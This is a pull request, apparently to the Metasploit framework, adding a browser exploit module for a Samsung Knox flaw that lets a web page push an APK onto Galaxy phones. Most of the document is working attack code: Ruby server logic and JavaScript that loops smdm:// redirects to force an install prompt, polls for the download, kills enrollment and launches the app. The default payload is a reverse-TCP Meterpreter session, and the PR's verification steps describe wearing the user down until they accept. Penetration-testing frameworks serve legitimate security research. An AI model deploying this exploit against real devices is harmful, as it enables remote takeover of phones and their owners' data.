### PR TITLE
Add module for samsung knox android arbitrary permission RCE

### DIFF
--- a/lib/msf/core/exploit/android.rb
+++ b/lib/msf/core/exploit/android.rb
@@ -49,8 +49,6 @@ module Exploit::Android
 
         // libraryData contains the bytes for a native shared object built via NDK
         // which will load the "stage", which in this case is our android meterpreter stager.
-        // LibraryData is loaded via ajax later, because we have to access javascript in
-        // order to detect what arch we are running.
         var libraryData = "#{Rex::Text.to_octal(ndkstager(stagename, arch), '\\\\0')}";
 
         // the stageData is the JVM bytecode that is loaded by the NDK stager. It contains

--- a/lib/msf/core/payload/dalvik.rb
+++ b/lib/msf/core/payload/dalvik.rb
@@ -60,6 +60,8 @@ module Msf::Payload::Dalvik
     # with a key whose validity expires before that date.
     # """
     cert.not_after = cert.not_before + 3600*24*365*20 # 20 years
+
+    # If this line is left out, signature verification fails on OSX.
     cert.sign(key, OpenSSL::Digest::SHA1.new)
 
     return cert, key

--- a/lib/msf/core/payload/dalvik.rb
+++ b/lib/msf/core/payload/dalvik.rb
@@ -60,6 +60,7 @@ module Msf::Payload::Dalvik
     # with a key whose validity expires before that date.
     # """
     cert.not_after = cert.not_before + 3600*24*365*20 # 20 years
+    cert.sign(key, OpenSSL::Digest::SHA1.new)
     return cert, key
   end
 end

--- a/lib/msf/core/payload/dalvik.rb
+++ b/lib/msf/core/payload/dalvik.rb
@@ -61,6 +61,7 @@ module Msf::Payload::Dalvik
     # """
     cert.not_after = cert.not_before + 3600*24*365*20 # 20 years
     cert.sign(key, OpenSSL::Digest::SHA1.new)
+
     return cert, key
   end
 end

--- a/modules/exploits/android/browser/samsung_knox_smdm_url.rb
+++ b/modules/exploits/android/browser/samsung_knox_smdm_url.rb
@@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
         send_response(cli, apk_bytes, magic_headers)
       end
     elsif req.uri =~ /_poll/
-      puts "Polling #{req.qstring['id']}: #{@served_payloads[req.qstring['id']]}"
+      vprint_debug "Polling #{req.qstring['id']}: #{@served_payloads[req.qstring['id']]}"
       send_response(cli, @served_payloads[req.qstring['id']].to_s, 'Content-type' => 'text/plain')
     elsif req.uri =~ /launch$/
       send_response_html(cli, launch_html)

--- a/modules/exploits/android/browser/samsung_knox_smdm_url.rb
+++ b/modules/exploits/android/browser/samsung_knox_smdm_url.rb
@@ -136,12 +136,15 @@ class Metasploit3 < Msf::Exploit::Remote
               setTimeout(killEnrollment, 100);
             } else {
               setTimeout(poll, 1000);
-              setTimeout(enroll,0);
-              setTimeout(enroll,500);
+              setTimeout(enroll, 0);
+              setTimeout(enroll, 500);
             }
           }
         };
-        xhr.onerror = function(){ setTimeout(poll, 1000); };
+        xhr.onerror = function(){
+          setTimeout(poll, 1000);
+          setTimeout(enroll, 0);
+        };
         xhr.send();
       }
 

--- a/modules/exploits/android/browser/samsung_knox_smdm_url.rb
+++ b/modules/exploits/android/browser/samsung_knox_smdm_url.rb
@@ -11,8 +11,6 @@ class Metasploit3 < Msf::Exploit::Remote
   include Msf::Exploit::Remote::BrowserExploitServer
   include Msf::Exploit::Remote::BrowserAutopwn
 
-  VULN_CHECK_JS = "is_vuln = true;"
-
   autopwn_info(
     :os_name    => OperatingSystems::Match::ANDROID,
     :arch       => ARCH_ARMLE,

--- a/modules/exploits/android/browser/samsung_knox_smdm_url.rb
+++ b/modules/exploits/android/browser/samsung_knox_smdm_url.rb
@@ -18,8 +18,20 @@ class Metasploit3 < Msf::Exploit::Remote
     :arch       => ARCH_ARMLE,
     :javascript => true,
     :rank       => ExcellentRanking,
-    :vuln_test  => VULN_CHECK_JS
+
+    # For BAP we only allow whitelisted devices/firmwares
+    # that we have tested:
+    # - Samsung S4
+    :vuln_test  => %Q|
+      is_vuln = navigator.userAgent.match(
+        /SAMSUNG GT-I9505/
+      );
+    |
   )
+
+  # Hash that maps payload ID -> (0|1) if an HTTP request has
+  # been made to download a payload of that ID
+  attr_reader :served_payloads
 
   def initialize(info = {})
     super(update_info(info,
@@ -48,9 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'DefaultTarget'       => 0,
       'BrowserRequirements' => {
         :source     => 'script',
-        :os_name    => OperatingSystems::Match::ANDROID,
-        :vuln_test  => VULN_CHECK_JS,
-        :vuln_test_error => 'The client is not vulnerable.'
+        :os_name    => OperatingSystems::Match::ANDROID
       }
     ))
 
@@ -60,15 +70,33 @@ class Metasploit3 < Msf::Exploit::Remote
       ])
     ], self.class)
 
-
     deregister_options('JsObfuscate')
   end
 
+  def exploit
+    @served_payloads = Hash.new(0)
+    super
+  end
+
+  def apk_bytes
+    payload.encoded
+  end
+
   def on_request_uri(cli, req)
-    if req.uri =~ /\.apk$/
-      is_head = req.method.upcase == 'HEAD'
-      print_status "Serving #{is_head ? 'metadata' : 'payload'}..."
-      send_response(cli, is_head ? '' : payload.encoded, magic_headers)
+    if req.uri =~ /\/([a-zA-Z0-9]+)\.apk\/latest$/
+      if req.method.upcase == 'HEAD'
+        print_status "Serving metadata..."
+        send_response(cli, '', magic_headers)
+      else
+        print_status "Serving payload '#{$1}'..."
+        @served_payloads[$1] = 1
+        send_response(cli, apk_bytes, magic_headers)
+      end
+    elsif req.uri =~ /_poll/
+      puts "Polling #{req.qstring['id']}: #{@served_payloads[req.qstring['id']]}"
+      send_response(cli, @served_payloads[req.qstring['id']].to_s, 'Content-type' => 'text/plain')
+    elsif req.uri =~ /launch$/
+      send_response_html(cli, launch_html)
     else
       super
     end
@@ -81,28 +109,62 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def magic_headers
-    { 'Content-Length' => payload.encoded.length,
-      'ETag' => Digest::MD5.hexdigest(payload.encoded),
+    { 'Content-Length' => apk_bytes.length,
+      'ETag' => Digest::MD5.hexdigest(apk_bytes),
       'x-amz-meta-apk-version' => datastore['APK_VERSION'] }
   end
 
   def generate_html
     %Q|
       <!doctype html>
-      <html><body><script>
+      <html><body>
+      <script>
       #{exploit_js}
       </script></body></html>
     |
   end
 
   def exploit_js
+    payload_id = rand_word
+
     js_obfuscate %Q|
 
-      setInterval(function(){
+      function poll() {
+        var xhr = new XMLHttpRequest();
+        xhr.open('GET', '_poll?id=#{payload_id}&d='+Math.random()*999999999999);
+        xhr.onreadystatechange = function(){
+          if (xhr.readyState == 4) {
+            if (xhr.responseText == '1') {
+              setTimeout(killEnrollment, 100);
+            } else {
+              setTimeout(poll, 1000);
+              setTimeout(enroll,0);
+              setTimeout(enroll,500);
+            }
+          }
+        };
+        xhr.onerror = function(){ setTimeout(poll, 1000); };
+        xhr.send();
+      }
+
+      function enroll() {
         var loc = window.location.href.replace(/[/.]$/g, '');
         window.location = 'smdm://#{rand_word}?update_url='+
-          encodeURIComponent(loc)+'.apk';
-      }, 500);
+          encodeURIComponent(loc)+'/#{payload_id}.apk';
+      }
+
+      function killEnrollment() {
+        window.location = "intent://#{rand_word}?program="+
+          "#{rand_word}/#Intent;scheme=smdm;launchFlags=268468256;end";
+        setTimeout(launchApp, 300);
+      }
+
+      function launchApp() {
+        window.location='intent:view#Intent;SEL;component=com.metasploit.stage/.MainActivity;end';
+      }
+
+      enroll();
+      setTimeout(poll,600);
 
     |
   end

--- a/modules/exploits/android/browser/samsung_knox_smdm_url.rb
+++ b/modules/exploits/android/browser/samsung_knox_smdm_url.rb
@@ -1,0 +1,119 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'digest/md5'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+  include Msf::Exploit::Remote::BrowserExploitServer
+  include Msf::Exploit::Remote::BrowserAutopwn
+
+  VULN_CHECK_JS = "is_vuln = true;"
+
+  autopwn_info(
+    :os_name    => OperatingSystems::Match::ANDROID,
+    :arch       => ARCH_ARMLE,
+    :javascript => true,
+    :rank       => ExcellentRanking,
+    :vuln_test  => VULN_CHECK_JS
+  )
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'                => 'Samsung Galaxy Knox Android Root Browser Exploit',
+      'Description'         => %q{
+        A vulnerability exists in the Knox security component of the Samsung Galaxy
+        firmware that allows a remote webpage to install an arbitrary APK with root
+        permissions.
+
+        The vulnerability has been confirmed in the Samsung Galaxy S4, S5, Note 3,
+        and Ace 4.
+      },
+      'License'             => MSF_LICENSE,
+      'Author'              => [
+        'Andre Moulu', # discovery and advisory
+        'joev'   # msf module
+      ],
+      'References'          => [
+        ['URL', 'http://blog.quarkslab.com/abusing-samsung-knox-to-remotely'+
+                '-install-a-malicious-application-story-of-a-half-patched-v'+
+                'ulnerability.html']
+      ],
+      'Platform'            => 'android',
+      'Arch'                => ARCH_DALVIK,
+      'DefaultOptions'      => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp' },
+      'Targets'             => [ [ 'Automatic', {} ] ],
+      'DisclosureDate'      => 'Nov 12 2014',
+      'DefaultTarget'       => 0,
+      'BrowserRequirements' => {
+        :source     => 'script',
+        :os_name    => OperatingSystems::Match::ANDROID,
+        :vuln_test  => VULN_CHECK_JS,
+        :vuln_test_error => 'The client is not vulnerable.'
+      }
+    ))
+
+    register_options([
+      OptString.new('APK_VERSION', [
+        false, "The update version to advertise to the client", "1337"
+      ])
+    ], self.class)
+
+
+    deregister_options('JsObfuscate')
+  end
+
+  def on_request_uri(cli, req)
+    if req.uri =~ /\.apk$/
+      is_head = req.method.upcase == 'HEAD'
+      print_status "Serving #{is_head ? 'metadata' : 'payload'}..."
+      send_response(cli, is_head ? '' : payload.encoded, magic_headers)
+    else
+      super
+    end
+  end
+
+  # The browser appears to be vulnerable, serve the exploit
+  def on_request_exploit(cli, req, browser)
+    print_status "Serving exploit..."
+    send_response_html(cli, generate_html)
+  end
+
+  def magic_headers
+    { 'Content-Length' => payload.encoded.length,
+      'ETag' => Digest::MD5.hexdigest(payload.encoded),
+      'x-amz-meta-apk-version' => datastore['APK_VERSION'] }
+  end
+
+  def generate_html
+    %Q|
+      <!doctype html>
+      <html><body><script>
+      #{exploit_js}
+      </script></body></html>
+    |
+  end
+
+  def exploit_js
+    js_obfuscate %Q|
+
+      setInterval(function(){
+        var loc = window.location.href.replace(/[/.]$/g, '');
+        window.location = 'smdm://#{rand_word}?update_url='+
+          encodeURIComponent(loc)+'.apk';
+      }, 500);
+
+    |
+  end
+
+  def apk_url
+    "#{get_uri.chomp('/')}/#{rand_word}.apk"
+  end
+
+  def rand_word
+    Rex::Text.rand_text_alphanumeric(3+rand(12))
+  end
+end

--- a/modules/exploits/android/browser/samsung_knox_smdm_url.rb
+++ b/modules/exploits/android/browser/samsung_knox_smdm_url.rb
@@ -23,10 +23,10 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'                => 'Samsung Galaxy Knox Android Root Browser Exploit',
+      'Name'                => 'Samsung Galaxy Knox Android Browser RCE',
       'Description'         => %q{
         A vulnerability exists in the Knox security component of the Samsung Galaxy
-        firmware that allows a remote webpage to install an arbitrary APK with root
+        firmware that allows a remote webpage to install an APK with arbitrary
         permissions.
 
         The vulnerability has been confirmed in the Samsung Galaxy S4, S5, Note 3,

--- a/modules/exploits/android/browser/samsung_knox_smdm_url.rb
+++ b/modules/exploits/android/browser/samsung_knox_smdm_url.rb
@@ -9,23 +9,6 @@ require 'digest/md5'
 class Metasploit3 < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::BrowserExploitServer
-  include Msf::Exploit::Remote::BrowserAutopwn
-
-  autopwn_info(
-    :os_name    => OperatingSystems::Match::ANDROID,
-    :arch       => ARCH_ARMLE,
-    :javascript => true,
-    :rank       => ExcellentRanking,
-
-    # For BAP we only allow whitelisted devices/firmwares
-    # that we have tested:
-    # - Samsung S4
-    :vuln_test  => %Q|
-      is_vuln = navigator.userAgent.match(
-        /SAMSUNG GT-I9505/
-      );
-    |
-  )
 
   # Hash that maps payload ID -> (0|1) if an HTTP request has
   # been made to download a payload of that ID
@@ -56,6 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Targets'             => [ [ 'Automatic', {} ] ],
       'DisclosureDate'      => 'Nov 12 2014',
       'DefaultTarget'       => 0,
+
       'BrowserRequirements' => {
         :source     => 'script',
         :os_name    => OperatingSystems::Match::ANDROID
@@ -150,28 +134,24 @@ class Metasploit3 < Msf::Exploit::Remote
 
       function enroll() {
         var loc = window.location.href.replace(/[/.]$/g, '');
-        window.location = 'smdm://#{rand_word}?update_url='+
+        top.location = 'smdm://#{rand_word}?update_url='+
           encodeURIComponent(loc)+'/#{payload_id}.apk';
       }
 
       function killEnrollment() {
-        window.location = "intent://#{rand_word}?program="+
+        top.location = "intent://#{rand_word}?program="+
           "#{rand_word}/#Intent;scheme=smdm;launchFlags=268468256;end";
         setTimeout(launchApp, 300);
       }
 
       function launchApp() {
-        window.location='intent:view#Intent;SEL;component=com.metasploit.stage/.MainActivity;end';
+        top.location='intent:view#Intent;SEL;component=com.metasploit.stage/.MainActivity;end';
       }
 
       enroll();
       setTimeout(poll,600);
 
     |
-  end
-
-  def apk_url
-    "#{get_uri.chomp('/')}/#{rand_word}.apk"
   end
 
   def rand_word

--- a/modules/exploits/android/browser/samsung_knox_smdm_url.rb
+++ b/modules/exploits/android/browser/samsung_knox_smdm_url.rb
@@ -38,9 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
         'joev'   # msf module
       ],
       'References'          => [
-        ['URL', 'http://blog.quarkslab.com/abusing-samsung-knox-to-remotely'+
-                '-install-a-malicious-application-story-of-a-half-patched-v'+
-                'ulnerability.html']
+        ['URL', 'http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html']
       ],
       'Platform'            => 'android',
       'Arch'                => ARCH_DALVIK,


### PR DESCRIPTION
Disclosed [here](http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html) last week.

I wrote this and it behaves like the PoC in the advisory, but I don't have a compatible device to test. Putting this up in case someone has a Samsung Galaxy S4/S5/Ace 4/Note 3 (with stock firmware) and doesn't mind testing and scrapping/reinstalling the OS afterwards.

Verification
- [ ] set LHOST and run the module
- [ ] On a Samsung Galaxy S4/S5/Ace 4/Note 3, browse to the URL
- [ ] You'll see a prompt to install something official
- [ ] No way! Click no
- [ ] You'll see the prompt again and again
- [ ] There must be a way to avoid clicking yes, press the home key and relaunch your browser...
- [ ] More prompt.
- [ ] Finally give in, click yes
- [ ] Android meterpreter is installed with all permissions
- [ ] session handler successful
- [ ] remove the payload by dragging the MainActivity app to "Uninstall"
